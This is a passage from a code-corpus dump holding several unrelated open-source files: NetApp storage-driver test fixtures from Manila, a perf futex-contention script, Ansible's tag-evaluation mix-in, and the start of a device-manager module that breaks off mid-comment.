</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.20</disk-name>
<disk-raid-info>
<effective-disk-type>%(type1)s</effective-disk-type>
</disk-raid-info>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.20</disk-name>
<disk-raid-info>
<effective-disk-type>%(type1)s</effective-disk-type>
</disk-raid-info>
</storage-disk-info>
</attributes-list>
<num-records>4</num-records>
</results>
""" % {
'type0': SHARE_AGGREGATE_DISK_TYPES[0],
'type1': SHARE_AGGREGATE_DISK_TYPES[1],
})
STORAGE_DISK_GET_ITER_RESPONSE_PAGE_1 = etree.XML("""
<results status="passed">
<attributes-list>
<storage-disk-info>
<disk-name>cluster3-01:v4.16</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.17</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.18</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.19</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.20</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.21</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.22</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.24</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.25</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.26</disk-name>
</storage-disk-info>
</attributes-list>
<next-tag>next_tag_1</next-tag>
<num-records>10</num-records>
</results>
""")
STORAGE_DISK_GET_ITER_RESPONSE_PAGE_2 = etree.XML("""
<results status="passed">
<attributes-list>
<storage-disk-info>
<disk-name>cluster3-01:v4.27</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.28</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.29</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.32</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.16</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.17</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.18</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.19</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.20</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.21</disk-name>
</storage-disk-info>
</attributes-list>
<next-tag>next_tag_2</next-tag>
<num-records>10</num-records>
</results>
""")
STORAGE_DISK_GET_ITER_RESPONSE_PAGE_3 = etree.XML("""
<results status="passed">
<attributes-list>
<storage-disk-info>
<disk-name>cluster3-01:v5.22</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.24</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.25</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.26</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.27</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.28</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.29</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.32</disk-name>
</storage-disk-info>
</attributes-list>
<num-records>8</num-records>
</results>
""")
GET_AGGREGATE_FOR_VOLUME_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<containing-aggregate-name>%(aggr)s</containing-aggregate-name>
<name>%(share)s</name>
<owning-vserver-name>os_aa666789-5576-4835-87b7-868069856459</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'aggr': SHARE_AGGREGATE_NAME,
'share': SHARE_NAME
})
GET_VOLUME_FOR_ENCRYPTED_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<encrypt>true</encrypt>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>manila_svm</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'volume': SHARE_NAME})
GET_VOLUME_FOR_ENCRYPTED_OLD_SYS_VERSION_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>manila_svm</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'volume': SHARE_NAME})
EXPORT_RULE_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<export-rule-info>
<client-match>%(rule)s</client-match>
<policy-name>%(policy)s</policy-name>
<rule-index>3</rule-index>
<vserver-name>manila_svm</vserver-name>
</export-rule-info>
<export-rule-info>
<client-match>%(rule)s</client-match>
<policy-name>%(policy)s</policy-name>
<rule-index>1</rule-index>
<vserver-name>manila_svm</vserver-name>
</export-rule-info>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {'policy': EXPORT_POLICY_NAME, 'rule': IP_ADDRESS})
VOLUME_GET_EXPORT_POLICY_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-export-attributes>
<policy>%(policy)s</policy>
</volume-export-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>manila_svm</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'policy': EXPORT_POLICY_NAME, 'volume': SHARE_NAME})
DELETED_EXPORT_POLICY_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<export-policy-info>
<policy-name>%(policy1)s</policy-name>
<vserver>%(vserver)s</vserver>
</export-policy-info>
<export-policy-info>
<policy-name>%(policy2)s</policy-name>
<vserver>%(vserver)s</vserver>
</export-policy-info>
<export-policy-info>
<policy-name>%(policy3)s</policy-name>
<vserver>%(vserver2)s</vserver>
</export-policy-info>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'vserver': VSERVER_NAME,
'vserver2': VSERVER_NAME_2,
'policy1': DELETED_EXPORT_POLICIES[VSERVER_NAME][0],
'policy2': DELETED_EXPORT_POLICIES[VSERVER_NAME][1],
'policy3': DELETED_EXPORT_POLICIES[VSERVER_NAME_2][0],
})
LUN_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<lun-info>
<path>/vol/%(volume)s/fakelun</path>
<qtree />
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</lun-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'vserver': VSERVER_NAME,
'volume': SHARE_NAME,
})
VOLUME_GET_ITER_NOT_UNIQUE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>%(volume1)s</name>
</volume-id-attributes>
</volume-attributes>
<volume-attributes>
<volume-id-attributes>
<name>%(volume2)s</name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'volume1': SHARE_NAME,
'volume2': SHARE_NAME_2,
})
VOLUME_GET_ITER_JUNCTIONED_VOLUMES_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>fake_volume</name>
<owning-vserver-name>test</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""")
VOLUME_GET_ITER_VOLUME_TO_MANAGE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<containing-aggregate-name>%(aggr)s</containing-aggregate-name>
<junction-path>/%(volume)s</junction-path>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
<style>flex</style>
<type>rw</type>
</volume-id-attributes>
<volume-space-attributes>
<size>%(size)s</size>
</volume-space-attributes>
<volume-qos-attributes>
<policy-group-name>%(qos-policy-group-name)s</policy-group-name>
</volume-qos-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'aggr': SHARE_AGGREGATE_NAME,
'vserver': VSERVER_NAME,
'volume': SHARE_NAME,
'size': SHARE_SIZE,
'qos-policy-group-name': QOS_POLICY_GROUP_NAME,
})
VOLUME_GET_ITER_NO_QOS_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<containing-aggregate-name>%(aggr)s</containing-aggregate-name>
<junction-path>/%(volume)s</junction-path>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
<style>flex</style>
<type>rw</type>
</volume-id-attributes>
<volume-space-attributes>
<size>%(size)s</size>
</volume-space-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'aggr': SHARE_AGGREGATE_NAME,
'vserver': VSERVER_NAME,
'volume': SHARE_NAME,
'size': SHARE_SIZE,
})
CLONE_CHILD_1 = 'fake_child_1'
CLONE_CHILD_2 = 'fake_child_2'
VOLUME_GET_ITER_CLONE_CHILDREN_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>%(clone1)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
<volume-attributes>
<volume-id-attributes>
<name>%(clone2)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'vserver': VSERVER_NAME,
'clone1': CLONE_CHILD_1,
'clone2': CLONE_CHILD_2,
})
SIS_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<sis-status-info>
<is-compression-enabled>true</is-compression-enabled>
<path>/vol/%(volume)s</path>
<state>enabled</state>
<vserver>%(vserver)s</vserver>
</sis-status-info>
</attributes-list>
</results>
""" % {
'vserver': VSERVER_NAME,
'volume': SHARE_NAME,
})
CLUSTER_PEER_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<cluster-peer-info>
<active-addresses>
<remote-inet-address>%(addr1)s</remote-inet-address>
<remote-inet-address>%(addr2)s</remote-inet-address>
</active-addresses>
<availability>available</availability>
<cluster-name>%(cluster)s</cluster-name>
<cluster-uuid>fake_uuid</cluster-uuid>
<peer-addresses>
<remote-inet-address>%(addr1)s</remote-inet-address>
</peer-addresses>
<remote-cluster-name>%(remote_cluster)s</remote-cluster-name>
<serial-number>fake_serial_number</serial-number>
<timeout>60</timeout>
</cluster-peer-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'addr1': CLUSTER_ADDRESS_1,
'addr2': CLUSTER_ADDRESS_2,
'cluster': CLUSTER_NAME,
'remote_cluster': REMOTE_CLUSTER_NAME,
})
CLUSTER_PEER_POLICY_GET_RESPONSE = etree.XML("""
<results status="passed">
<attributes>
<cluster-peer-policy>
<is-unauthenticated-access-permitted>false</is-unauthenticated-access-permitted>
<passphrase-minimum-length>8</passphrase-minimum-length>
</cluster-peer-policy>
</attributes>
</results>
""")
VSERVER_PEER_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-peer-info>
<applications>
<vserver-peer-application>snapmirror</vserver-peer-application>
</applications>
<peer-cluster>%(cluster)s</peer-cluster>
<peer-state>peered</peer-state>
<peer-vserver>%(vserver2)s</peer-vserver>
<vserver>%(vserver1)s</vserver>
</vserver-peer-info>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'cluster': CLUSTER_NAME,
'vserver1': VSERVER_NAME,
'vserver2': VSERVER_NAME_2
})
SNAPMIRROR_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapmirror-info>
<destination-volume>fake_destination_volume</destination-volume>
<destination-volume-node>fake_destination_node</destination-volume-node>
<destination-vserver>fake_destination_vserver</destination-vserver>
<exported-snapshot>fake_snapshot</exported-snapshot>
<exported-snapshot-timestamp>1442701782</exported-snapshot-timestamp>
<is-constituent>false</is-constituent>
<is-healthy>true</is-healthy>
<lag-time>2187</lag-time>
<last-transfer-duration>109</last-transfer-duration>
<last-transfer-end-timestamp>1442701890</last-transfer-end-timestamp>
<last-transfer-from>test:manila</last-transfer-from>
<last-transfer-size>1171456</last-transfer-size>
<last-transfer-type>initialize</last-transfer-type>
<max-transfer-rate>0</max-transfer-rate>
<mirror-state>snapmirrored</mirror-state>
<newest-snapshot>fake_snapshot</newest-snapshot>
<newest-snapshot-timestamp>1442701782</newest-snapshot-timestamp>
<policy>DPDefault</policy>
<relationship-control-plane>v2</relationship-control-plane>
<relationship-id>ea8bfcc6-5f1d-11e5-8446-123478563412</relationship-id>
<relationship-status>idle</relationship-status>
<relationship-type>data_protection</relationship-type>
<schedule>daily</schedule>
<source-volume>fake_source_volume</source-volume>
<source-vserver>fake_source_vserver</source-vserver>
<vserver>fake_destination_vserver</vserver>
</snapmirror-info>
</attributes-list>
<num-records>1</num-records>
</results>
""")
SNAPMIRROR_GET_ITER_FILTERED_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapmirror-info>
<destination-vserver>fake_destination_vserver</destination-vserver>
<destination-volume>fake_destination_volume</destination-volume>
<is-healthy>true</is-healthy>
<mirror-state>snapmirrored</mirror-state>
<schedule>daily</schedule>
<source-vserver>fake_source_vserver</source-vserver>
<source-volume>fake_source_volume</source-volume>
</snapmirror-info>
</attributes-list>
<num-records>1</num-records>
</results>
""")
SNAPMIRROR_INITIALIZE_RESULT = etree.XML("""
<results status="passed">
<result-status>succeeded</result-status>
</results>
""")
VOLUME_MOVE_GET_ITER_RESULT = etree.XML("""
<results status="passed">
<attributes-list>
<volume-move-info>
<cutover-action>retry_on_failure</cutover-action>
<details>Cutover Completed::Volume move job finishing move</details>
<estimated-completion-time>1481919246</estimated-completion-time>
<percent-complete>82</percent-complete>
<phase>finishing</phase>
<state>healthy</state>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</volume-move-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
# Label names for the total_cp_msecs array counter (one per WAFL
# consistency-point phase); joined and substituted into the response below.
PERF_OBJECT_COUNTER_TOTAL_CP_MSECS_LABELS = [
    'SETUP', 'PRE_P0', 'P0_SNAP_DEL', 'P1_CLEAN', 'P1_QUOTA', 'IPU_DISK_ADD',
    'P2V_INOFILE', 'P2V_INO_PUB', 'P2V_INO_PRI', 'P2V_FSINFO', 'P2V_DLOG1',
    'P2V_DLOG2', 'P2V_REFCOUNT', 'P2V_TOPAA', 'P2V_DF_SCORES_SUB', 'P2V_BM',
    'P2V_SNAP', 'P2V_DF_SCORES', 'P2V_VOLINFO', 'P2V_CONT', 'P2A_INOFILE',
    'P2A_INO', 'P2A_DLOG1', 'P2A_HYA', 'P2A_DLOG2', 'P2A_FSINFO',
    'P2A_IPU_BITMAP_GROW', 'P2A_REFCOUNT', 'P2A_TOPAA', 'P2A_HYABC', 'P2A_BM',
    'P2A_SNAP', 'P2A_VOLINFO', 'P2_FLUSH', 'P2_FINISH', 'P3_WAIT',
    'P3V_VOLINFO', 'P3A_VOLINFO', 'P3_FINISH', 'P4_FINISH', 'P5_FINISH',
]
PERF_OBJECT_COUNTER_LIST_INFO_WAFL_RESPONSE = etree.XML("""
<results status="passed">
<counters>
<counter-info>
<desc>No. of times 8.3 names are accessed per second.</desc>
<name>access_8_3_names</name>
<privilege-level>diag</privilege-level>
<properties>rate</properties>
<unit>per_sec</unit>
</counter-info>
<counter-info>
<desc>Array of counts of different types of CPs</desc>
<labels>
<label-info>wafl_timer generated CP</label-info>
<label-info>snapshot generated CP</label-info>
<label-info>wafl_avail_bufs generated CP</label-info>
<label-info>dirty_blk_cnt generated CP</label-info>
<label-info>full NV-log generated CP,back-to-back CP</label-info>
<label-info>flush generated CP,sync generated CP</label-info>
<label-info>deferred back-to-back CP</label-info>
<label-info>low mbufs generated CP</label-info>
<label-info>low datavecs generated CP</label-info>
<label-info>nvlog replay takeover time limit CP</label-info>
</labels>
<name>cp_count</name>
<privilege-level>diag</privilege-level>
<properties>delta</properties>
<type>array</type>
<unit>none</unit>
</counter-info>
<counter-info>
<base-counter>total_cp_msecs</base-counter>
<desc>Array of percentage time spent in different phases of CP</desc>
<labels>
<label-info>%(labels)s</label-info>
</labels>
<name>cp_phase_times</name>
<privilege-level>diag</privilege-level>
<properties>percent</properties>
<type>array</type>
<unit>percent</unit>
</counter-info>
</counters>
</results>
""" % {'labels': ','.join(PERF_OBJECT_COUNTER_TOTAL_CP_MSECS_LABELS)})
PERF_OBJECT_GET_INSTANCES_SYSTEM_RESPONSE_CMODE = etree.XML("""
<results status="passed">
<instances>
<instance-data>
<counters>
<counter-data>
<name>avg_processor_busy</name>
<value>5674745133134</value>
</counter-data>
</counters>
<name>system</name>
<uuid>%(node1)s:kernel:system</uuid>
</instance-data>
<instance-data>
<counters>
<counter-data>
<name>avg_processor_busy</name>
<value>4077649009234</value>
</counter-data>
</counters>
<name>system</name>
<uuid>%(node2)s:kernel:system</uuid>
</instance-data>
</instances>
<timestamp>1453412013</timestamp>
</results>
""" % {'node1': NODE_NAMES[0], 'node2': NODE_NAMES[1]})
PERF_OBJECT_GET_INSTANCES_SYSTEM_RESPONSE_7MODE = etree.XML("""
<results status="passed">
<timestamp>1454146292</timestamp>
<instances>
<instance-data>
<name>system</name>
<counters>
<counter-data>
<name>avg_processor_busy</name>
<value>13215732322</value>
</counter-data>
</counters>
</instance-data>
</instances>
</results>""")
PERF_OBJECT_INSTANCE_LIST_INFO_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<instance-info>
<name>system</name>
<uuid>%(node)s:kernel:system</uuid>
</instance-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'node': NODE_NAME})
PERF_OBJECT_INSTANCE_LIST_INFO_RESPONSE = etree.XML("""
<results status="passed">
<instances>
<instance-info>
<name>processor0</name>
</instance-info>
<instance-info>
<name>processor1</name>
</instance-info>
</instances>
</results>""")
NET_ROUTES_CREATE_RESPONSE = etree.XML("""
<results status="passed">
<result>
<net-vs-routes-info>
<address-family>ipv4</address-family>
<destination>%(subnet)s</destination>
<gateway>%(gateway)s</gateway>
<metric>20</metric>
<vserver>%(vserver)s</vserver>
</net-vs-routes-info>
</result>
</results>""" % {
'gateway': GATEWAY,
'vserver': VSERVER_NAME,
'subnet': SUBNET,
})
# qos-policy-group-get-iter reply for a single QoS policy group.
# NOTE: the substitution key was previously misspelled 'max_througput';
# it is renamed to 'max_throughput' in both the template and the mapping
# below, so the rendered XML is byte-for-byte unchanged.
QOS_POLICY_GROUP_GET_ITER_RESPONSE = etree.XML("""
    <results status="passed">
        <attributes-list>
            <qos-policy-group-info>
                <max-throughput>%(max_throughput)s</max-throughput>
                <num-workloads>1</num-workloads>
                <policy-group>%(qos_policy_group_name)s</policy-group>
                <vserver>%(vserver)s</vserver>
            </qos-policy-group-info>
        </attributes-list>
        <num-records>1</num-records>
    </results>""" % {
    'qos_policy_group_name': QOS_POLICY_GROUP_NAME,
    'vserver': VSERVER_NAME,
    'max_throughput': QOS_MAX_THROUGHPUT,
})
FAKE_VOL_XML = """<volume-info>
<name>open123</name>
<state>online</state>
<size-total>0</size-total>
<size-used>0</size-used>
<size-available>0</size-available>
<is-inconsistent>false</is-inconsistent>
<is-invalid>false</is-invalid>
</volume-info>"""
FAKE_XML1 = """<options>\
<test1>abc</test1>\
<test2>abc</test2>\
</options>"""
FAKE_XML2 = """<root><options>somecontent</options></root>"""
FAKE_NA_ELEMENT = api.NaElement(etree.XML(FAKE_VOL_XML))
FAKE_INVOKE_DATA = 'somecontent'
FAKE_XML_STR = 'abc'
FAKE_API_NAME = 'volume-get-iter'
FAKE_API_NAME_ELEMENT = api.NaElement(FAKE_API_NAME)
FAKE_NA_SERVER_STR = '127.0.0.1'
FAKE_NA_SERVER = api.NaServer(FAKE_NA_SERVER_STR)
FAKE_NA_SERVER_API_1_5 = api.NaServer(FAKE_NA_SERVER_STR)
FAKE_NA_SERVER_API_1_5.set_vfiler('filer')
FAKE_NA_SERVER_API_1_5.set_api_version(1, 5)
FAKE_NA_SERVER_API_1_14 = api.NaServer(FAKE_NA_SERVER_STR)
FAKE_NA_SERVER_API_1_14.set_vserver('server')
FAKE_NA_SERVER_API_1_14.set_api_version(1, 14)
FAKE_NA_SERVER_API_1_20 = api.NaServer(FAKE_NA_SERVER_STR)
FAKE_NA_SERVER_API_1_20.set_vfiler('filer')
FAKE_NA_SERVER_API_1_20.set_vserver('server')
FAKE_NA_SERVER_API_1_20.set_api_version(1, 20)
FAKE_QUERY = {'volume-attributes': None}
FAKE_DES_ATTR = {'volume-attributes': ['volume-id-attributes',
'volume-space-attributes',
'volume-state-attributes',
'volume-qos-attributes']}
FAKE_CALL_ARGS_LIST = [mock.call(80), mock.call(8088), mock.call(443),
mock.call(8488)]
FAKE_RESULT_API_ERR_REASON = api.NaElement('result')
FAKE_RESULT_API_ERR_REASON.add_attr('errno', '000')
FAKE_RESULT_API_ERR_REASON.add_attr('reason', 'fake_reason')
FAKE_RESULT_API_ERRNO_INVALID = api.NaElement('result')
FAKE_RESULT_API_ERRNO_INVALID.add_attr('errno', '000')
FAKE_RESULT_API_ERRNO_VALID = api.NaElement('result')
FAKE_RESULT_API_ERRNO_VALID.add_attr('errno', '14956')
FAKE_RESULT_SUCCESS = api.NaElement('result')
FAKE_RESULT_SUCCESS.add_attr('status', 'passed')
FAKE_HTTP_OPENER = urllib.request.build_opener()
FAKE_MANAGE_VOLUME = {
'aggregate': SHARE_AGGREGATE_NAME,
'name': SHARE_NAME,
'owning-vserver-name': VSERVER_NAME,
'junction_path': VOLUME_JUNCTION_PATH,
'style': 'fake_style',
'size': SHARE_SIZE,
}
FAKE_KEY_MANAGER_ERROR = "The onboard key manager is not enabled. To enable \
it, run \"security key-manager setup\"."
| apache-2.0 |
ashleyjune/SM-G360T1_kernel | tools/perf/scripts/python/futex-contention.py | 11261 | 1486 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
# Long-lived bookkeeping shared by the enter/exit handlers below.
# BUG FIX: process_names was assigned twice; the redundant first
# assignment has been dropped.
thread_thislock = {}   # tid -> futex address the thread is blocked on
thread_blocktime = {}  # tid -> timestamp (ns) at which the thread blocked
lock_waits = {}        # long-lived stats on (tid,lock) blockage elapsed time
process_names = {}     # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
                              nr, uaddr, op, val, utime, uaddr2, val3):
    """Record the moment a thread starts blocking on a futex."""
    # Only FUTEX_WAIT marks the start of a blockage; ignore the
    # originators of WAKE (and other) operations.
    if (op & FUTEX_CMD_MASK) != FUTEX_WAIT:
        return
    process_names[tid] = comm
    thread_thislock[tid] = uaddr
    thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
                             nr, ret):
    """On return from futex(2), account the elapsed blockage time."""
    # BUG FIX: dict.has_key() was removed in Python 3; the 'in' operator
    # is equivalent and works on both Python 2 and 3.
    if tid in thread_blocktime:
        elapsed = nsecs(s, ns) - thread_blocktime[tid]
        add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
        del thread_blocktime[tid]
        del thread_thislock[tid]
def trace_begin():
    """Called once before event processing starts."""
    # print() with a single argument produces identical output on
    # Python 2 and 3, unlike the Python-2-only print statement used before.
    print("Press control+C to stop and show the summary")
def trace_end():
    """Called once at the end: dump per-(thread, lock) contention stats."""
    # Converted the Python-2-only print statement to the print() call form
    # (same output on 2 and 3), and renamed the unpacked locals so they no
    # longer shadow the builtins min() and max().
    for (tid, lock) in lock_waits:
        wait_min, wait_max, wait_avg, wait_count = lock_waits[tid, lock]
        print("%s[%d] lock %x contended %d times, %d avg ns" %
              (process_names[tid], tid, lock, wait_count, wait_avg))
| gpl-2.0 |
domibarton/ansible | lib/ansible/playbook/taggable.py | 23 | 3293 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import itertools
from ansible.compat.six import string_types
from ansible.errors import AnsibleError
from ansible.playbook.attribute import FieldAttribute
from ansible.template import Templar
class Taggable:
    """Mix-in providing the ``tags`` attribute and tag-based run/skip logic."""

    # Sentinel tag set applied to objects that carry no tags of their own.
    untagged = frozenset(['untagged'])
    _tags = FieldAttribute(isa='list', default=[], listof=(string_types, int))

    def __init__(self):
        super(Taggable, self).__init__()

    def _load_tags(self, attr, ds):
        """Attribute loader: accept a list of tags or a single tag string."""
        if isinstance(ds, list):
            return ds
        # BUG FIX: this previously tested isinstance(ds, basestring), a
        # Python-2-only name that raises NameError on Python 3; use the
        # six string_types already imported by this module instead.
        elif isinstance(ds, string_types):
            return [ds]
        else:
            raise AnsibleError('tags must be specified as a list', obj=ds)

    def _get_attr_tags(self):
        '''
        Override for the 'tags' getattr fetcher, used from Base.
        '''
        tags = self._attributes['tags']
        if tags is None:
            tags = []
        # merge in tags inherited from the parent object, when one exists
        if hasattr(self, '_get_parent_attribute'):
            tags = self._get_parent_attribute('tags', extend=True)
        return tags

    def evaluate_tags(self, only_tags, skip_tags, all_vars):
        ''' this checks if the current item should be executed depending on tag options '''
        should_run = True
        if self.tags:
            templar = Templar(loader=self._loader, variables=all_vars)
            tags = templar.template(self.tags)
            if not isinstance(tags, list):
                # a templated scalar may itself be a comma-separated list
                if tags.find(',') != -1:
                    tags = set(tags.split(','))
                else:
                    tags = set([tags])
            else:
                tags = set([i for i, _ in itertools.groupby(tags)])
        else:
            # this makes isdisjoint work for untagged
            tags = self.untagged
        if only_tags:
            should_run = False
            if 'always' in tags or 'all' in only_tags:
                should_run = True
            elif not tags.isdisjoint(only_tags):
                should_run = True
            elif 'tagged' in only_tags and tags != self.untagged:
                should_run = True
        if should_run and skip_tags:
            # Check for tags that we need to skip
            if 'all' in skip_tags:
                # 'always' survives --skip-tags all unless skipped explicitly
                if 'always' not in tags or 'always' in skip_tags:
                    should_run = False
            elif not tags.isdisjoint(skip_tags):
                should_run = False
            elif 'tagged' in skip_tags and tags != self.untagged:
                should_run = False
        return should_run
| gpl-3.0 |
drkitty/arim | arim/udm.py | 2 | 6265 | from hashlib import md5
from string import hexdigits
from time import time
import urllib2
from django.conf import settings
from arim.conrad import Conrad
from arim.constants import (
API_KEY, BASE_URL, CTNR_ENDPOINT, USER_QUERY_KEY, SYSTEM_ENDPOINT,
DESC_ATTR, SYSTEM_QUERY_KEY, DYNINTR_ENDPOINT, USER_ATTR, SYSTEM_NAME,
SYSTEM_DETAIL_ENDPOINT, SYSTEM_ATTR_ENDPOINT, DYNINTR_WORKGROUP,
DYNINTR_RANGE, DYNINTR_CTNR)
from arim.utils import first
class UserDeviceManager(object):
    """Manage a user's registered devices (systems plus their dynamic
    interfaces) through the Conrad REST API client."""

    @staticmethod
    def process_mac(mac):
        """Strip every non-hex character (colons, dashes, dots) from *mac*."""
        # str.join keeps this working on both Python 2 and 3; the previous
        # filter() call would return a lazy iterator (not a str) on Python 3.
        return ''.join(c for c in mac if c in hexdigits)

    def __init__(self, user, api_client=None):
        """Bind the manager to *user*; an *api_client* may be injected
        (e.g. for testing), otherwise a default Conrad client is built."""
        self.username = user
        self.api_client = api_client or Conrad(API_KEY, BASE_URL)

    def get_all(self):
        """Return all of the user's devices as dicts with id/description/mac."""
        # first get the list of systems, following pagination
        query = {USER_QUERY_KEY: self.username}
        systems = self.api_client.get(SYSTEM_ENDPOINT, query=query)
        while self.api_client.get_next():
            systems += self.api_client.result['results']
        # now add MAC info
        devices = []
        for s in systems:
            # get description (Hardware type); a list comprehension (rather
            # than filter()) keeps the emptiness test valid on Python 3 too
            desc_eavs = [eav for eav in s['systemav_set']
                         if eav['attribute'] == DESC_ATTR]
            if not desc_eavs:
                continue
            desc = desc_eavs[0]['value']
            # get MAC: find the dynamic interface by system ID
            query = {SYSTEM_QUERY_KEY: s['id']}
            ds = self.api_client.get(DYNINTR_ENDPOINT, query=query)
            if not ds:
                continue
            d = ds[0]
            mac = d['mac']
            if d['range'] == DYNINTR_RANGE:
                devices.append({
                    'id': s['id'],
                    'description': desc,
                    'mac': mac,
                })
        return devices

    def get(self, pk):
        """Return one device dict by system pk, or False if the system is
        not owned by this user."""
        system = self.api_client.get(SYSTEM_ENDPOINT, pk=pk)
        # make sure the system is the user's.
        # BUG FIX: the old code compared the whole EAV dict (instead of its
        # 'attribute' field) to USER_ATTR and called next() directly on the
